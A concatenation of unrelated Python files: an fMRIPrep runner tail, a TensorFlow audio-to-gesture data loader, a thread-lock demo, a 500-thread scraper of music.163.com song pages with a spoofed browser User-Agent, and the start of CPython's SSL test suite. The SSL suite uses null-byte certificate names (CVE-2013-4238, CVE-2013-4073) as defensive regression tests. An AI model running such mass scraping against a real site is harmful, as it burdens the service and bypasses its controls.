if (config.execution.output_dir / 'fmriprep' / 'logs' / 'CITATION.md').exists():
config.loggers.workflow.log(
25, 'Works derived from this fMRIPrep execution should '
'include the following boilerplate:\n\n%s',
(config.execution.output_dir / 'fmriprep' / 'logs' / 'CITATION.md').read_text()
)
if config.workflow.run_reconall:
from templateflow import api
from niworkflows.utils.misc import _copy_any
dseg_tsv = str(api.get('fsaverage', suffix='dseg', extension=['.tsv']))
_copy_any(dseg_tsv,
str(config.execution.output_dir / 'fmriprep' / 'desc-aseg_dseg.tsv'))
_copy_any(dseg_tsv,
str(config.execution.output_dir / 'fmriprep' / 'desc-aparcaseg_dseg.tsv'))
errno = 0
finally:
from niworkflows.reports import generate_reports
from pkg_resources import resource_filename as pkgrf
# Generate reports phase
failed_reports = generate_reports(
config.execution.participant_label,
config.execution.output_dir,
config.execution.work_dir,
config.execution.run_uuid,
config=pkgrf('fmriprep', 'data/reports-spec.yml'),
packagename='fmriprep')
write_derivative_description(
config.execution.bids_dir,
config.execution.output_dir / 'fmriprep')
if failed_reports and not config.execution.notrack:
sentry_sdk.capture_message(
'Report generation failed for %d subjects' % failed_reports,
level='error')
sys.exit(int((errno + failed_reports) > 0))
if __name__ == '__main__':
raise RuntimeError("fmriprep/cli/run.py should not be run directly;\n"
"Please `pip install` fmriprep and use the `fmriprep` command")
|
data_set_helpers.py
|
import pandas
import tensorflow as tf
import numpy as np
from threading import Thread
from math import ceil
from six.moves import range
from gesgen_keras.util.audio import audiofile_to_input_vector
from gesgen_keras.util.gesture import gesturefile_to_label_vector
from gesgen_keras.util.gpu import get_available_gpus
from gesgen_keras.util.text import ctc_label_dense_to_sparse, text_to_char_array
class DataSets(object):
def __init__(self, train, dev, test):
'''Container for train, dev and test sets of one corpus.
Args:
train (DataSet): the train data set of the corpus
dev (DataSet): the validation data set of the corpus
test (DataSet): the test data set of the corpus
'''
self._dev = dev
self._test = test
self._train = train
def start_queue_threads(self, session):
self._dev.start_queue_threads(session)
self._test.start_queue_threads(session)
self._train.start_queue_threads(session)
@property
def train(self):
return self._train
@property
def dev(self):
return self._dev
@property
def test(self):
return self._test
class DataSet(object):
def __init__(self, files_list, thread_count, batch_size, numcep, numcontext, next_index=lambda x: x + 1):
numchannels = 6
numjoints = 51
self._coord = None
self._numcep = numcep
self._x = tf.placeholder(tf.float32, [None, numcep + (2 * numcep * numcontext)])
self._x_length = tf.placeholder(tf.int32, [])
self._y = tf.placeholder(tf.float32, [None, numchannels * numjoints + 3])
self._y_length = tf.placeholder(tf.int32, [])
self.example_queue = tf.PaddingFIFOQueue(shapes=[[None, numcep + (2 * numcep * numcontext)], [], [None, numchannels * numjoints + 3], []],
dtypes=[tf.float32, tf.int32, tf.float32, tf.int32],
capacity=2 * self._get_device_count() * batch_size)
self._enqueue_op = self.example_queue.enqueue([self._x, self._x_length, self._y, self._y_length])
self._close_op = self.example_queue.close(cancel_pending_enqueues=True)
self.batch_size = batch_size
self._numcontext = numcontext
self._thread_count = thread_count
self._files_list = self._create_files_list(files_list)
self._next_index = next_index
def _get_device_count(self):
available_gpus = get_available_gpus()
return max(len(available_gpus), 1)
def start_queue_threads(self, session, coord):
self._coord = coord
batch_threads = [Thread(target=self._populate_batch_queue, args=(session,)) for i in range(self._thread_count)]
for batch_thread in batch_threads:
self._coord.register_thread(batch_thread)
batch_thread.daemon = True
batch_thread.start()
return batch_threads
def close_queue(self, session):
session.run(self._close_op)
def _create_files_list(self, files_list):
# 1. Sort by wav filesize
# 2. Select just wav filename and bvh filename columns
# 3. Return a NumPy representation
return files_list.sort_values(by="wav_filesize") \
.ix[:, ["wav_filename", "bvh_filename"]] \
.values
def _indices(self):
index = -1
while not self._coord.should_stop():
index = self._next_index(index) % len(self._files_list)
yield self._files_list[index]
def _populate_batch_queue(self, session):
for wav_file, bvh_file in self._indices():
source = audiofile_to_input_vector(wav_file, self._numcep, self._numcontext)
source_len = len(source)
target = gesturefile_to_label_vector(bvh_file)
target_len = len(target)
source, source_len, target, target_len = self._clip_vectors(source, source_len, target, target_len)
#print("source_len: " + str(source_len))
#print("target_len: " + str(target_len))
try:
session.run(self._enqueue_op, feed_dict={
self._x: source,
self._x_length: source_len,
self._y: target,
self._y_length: target_len})
except tf.errors.CancelledError:
return
def _clip_vectors(self, source, source_len, target, target_len):
# clip the longer vector so that the lengths are equal(experimental)
if source_len > target_len:
source = np.delete(source, np.s_[target_len:], 0)
source_len = target_len
elif source_len < target_len:
target = np.delete(target, np.s_[source_len:], 0)
target_len = source_len
return source, source_len, target, target_len
def next_batch(self):
source, source_lengths, target, target_lengths = self.example_queue.dequeue_many(self.batch_size)
#sparse_labels = ctc_label_dense_to_sparse(target, target_lengths, self.batch_size)
return source, source_lengths, target
@property
def total_batches(self):
# Note: If len(_files_list) % batch_size != 0, this re-uses initial files
return int(ceil(len(self._files_list) / self.batch_size))
class SwitchableDataSet(object):
def __init__(self, data_sets):
'''Data set that is wrapping a data sets instance to switch between train, dev and test instances during training.
Args:
data_sets (DataSets): the corpus container holding all three data sets
'''
self._data_sets = data_sets
self._sets = [data_sets.train, data_sets.dev, data_sets.test]
self._queues = [s.example_queue for s in self._sets]
self._queue_selector = tf.placeholder(tf.int32, name='Queue_Selector')
self._queue = tf.QueueBase.from_list(self._queue_selector, self._queues)
self._close_op = self._queue.close(cancel_pending_enqueues=True)
self._data_set = data_sets.train
def set_data_set(self, feed_dict, data_set):
index = self._sets.index(data_set)
assert index >= 0
feed_dict[self._queue_selector] = index
self._data_set = data_set
def start_queue_threads(self, session, coord):
batch_threads = []
for s in self._sets:
batch_threads += s.start_queue_threads(session, coord)
return batch_threads
def close_queue(self, session):
for s in self._sets:
s.close_queue(session)
session.run(self._close_op, feed_dict={ self._queue_selector: 0 })
def next_batch(self):
source, source_lengths, target, target_lengths = self._queue.dequeue_many(self._data_set.batch_size)
#sparse_labels = ctc_label_dense_to_sparse(target, target_lengths, self._data_set.batch_size)
return source, source_lengths, target
def read_data_sets(train_csvs, dev_csvs, test_csvs,
train_batch_size, dev_batch_size, test_batch_size,
numcep, numcontext, thread_count=8,
stride=1, offset=0, next_index=lambda s, i: i + 1,
limit_dev=0, limit_test=0, limit_train=0):
# Read the processed set files from disk
def read_csvs(csvs):
files = None
for csv in csvs:
file = pandas.read_csv(csv)
if files is None:
files = file
else:
files = files.append(file)
return files
train_files = read_csvs(train_csvs)
dev_files = read_csvs(dev_csvs)
test_files = read_csvs(test_csvs)
# Create train DataSet from all the train archives
train = _read_data_set(train_files, thread_count, train_batch_size, numcep, numcontext, stride=stride, offset=offset, next_index=lambda i: next_index('train', i), limit=limit_train)
# Create dev DataSet from all the dev archives
dev = _read_data_set(dev_files, thread_count, dev_batch_size, numcep, numcontext, stride=stride, offset=offset, next_index=lambda i: next_index('dev', i), limit=limit_dev)
# Create test DataSet from all the test archives
test = _read_data_set(test_files, thread_count, test_batch_size, numcep, numcontext, stride=stride, offset=offset, next_index=lambda i: next_index('test', i), limit=limit_test)
# Return DataSets
return DataSets(train, dev, test)
def _read_data_set(filelist, thread_count, batch_size, numcep, numcontext, stride=1, offset=0, next_index=lambda i: i + 1, limit=0):
# Optionally apply dataset size limits
if limit > 0:
filelist = filelist.iloc[:limit]
filelist = filelist[offset::stride]
# Return DataSet
return DataSet(filelist, thread_count, batch_size, numcep, numcontext, next_index=next_index)
|
thread.py
|
import threading
from time import sleep
lock = threading.Lock()
# funcao que espera 1 segundo
def wait():
global lock
while True:
sleep(1)
lock.release()
def LerVelocidade():
global lock
while True:
lock.acquire()
print('Leitura da Velocidade')
print('cheguei')
# ----------------criando a thread
lock.acquire()
t = threading.Thread(target=wait, name='Wait')
t1 = threading.Thread(target=LerVelocidade, name='Velocidade')
t.start()
t1.start()
|
song.py
|
import requests
import re
from bs4 import BeautifulSoup
import json
import time
import threading
import os
import pickle
headers = {
"Host":"music.163.com",
"Referer":"http://music.163.com/",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"}
def Find(pat,text):
match = re.search(pat,text)
if match == None:
return ''
#print(match.group(1))
return match.group(1)
def getSong2(idSong = "246316"):
global fileSong,lock,threads,hashSongvisited
urlSong = 'http://music.163.com/song?id='
try:
r = requests.get(urlSong + idSong,headers = headers,timeout = 1)
except:
if lock.acquire():
threads-=1
lock.release()
return
text = r.text
patTitle = r'(?:data-res-name=")(.+?)(?:")'
title = Find(patTitle,text)
#飞
patAuthor = r'(?:data-res-author=")(.+?)(?:")'
author = Find(patAuthor,text)
#洪辰
patAlbum = r'(?:class="s-fc7">)(.*?)(?:</a>)'
album = Find(patAlbum,text)
#72小姐
patImage = r'(?:class="j-img" data-src=")(.*?jpg)(?:">)'
image = Find(patImage,text)
#http://p1.music.126.net/Y0MWOGVy-xhVRyhT_LnSVQ==/109951163077105754.jpg
t = ','.join([idSong,title,author,album,image])
if lock.acquire():
fileSong.write(t.encode('utf-8'))
fileSong.write('\n'.encode('utf-8'))
threads-=1
hashSongvisited[idSong] = True
lock.release()
#Initialization
if os.path.exists('song_visit.db'):
hashSongvisited = pickle.load(open('song_visit.db','rb'))
else:
hashSongvisited = {}
print('visited: ', len(hashSongvisited))
f = open('song.db','r')
fileSong = open('song_details.db','ab')
maxThreads = 500
threads = 0
lock = threading.Lock()
count = 1
last = time.time()
alpha = 0.8
for line in f:
id = line.strip('\n')
if threads<maxThreads:
if hashSongvisited.get(id,False)==False:
if lock.acquire():
threads+=1
lock.release()
time.sleep(0.005)
threading.Thread(target=getSong2,args=(id,)).start()
count+=1
if count%100==0:
if time.time()-last < alpha:
time.sleep(alpha-(time.time()-last))
try:
print("threads= ",threads,'\t',len(hashSongvisited),'\t','time= %.2f'%(time.time()-last))
except:
pass
last = time.time()
if count>=2000:
pickle.dump(hashSongvisited,open('song_visit.db','wb'))
print('-'*10+'pickled'+'-'*10)
count-=2000
while True:
time.sleep(0.5)
if lock.acquire():
if not threads:
lock.release()
break
else:
lock.release()
f.close()
fileSong.close()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
from unittest import mock
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNING_CA = data_file("pycacert.pem")
SVN_PYTHON_ORG_ROOT_CERT = data_file("https_svn_python_org_root.pem")
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
WRONGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh512.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_SSLv23
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_SSLv23')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_DER_to_PEM(self):
with open(SVN_PYTHON_ORG_ROOT_CERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 26)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if "LibreSSL" in s:
self.assertTrue(s.startswith("LibreSSL {:d}.{:d}".format(major, minor)),
(s, t))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with ssl.wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=CERTFILE, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=WRONGCERT, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with ssl.wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
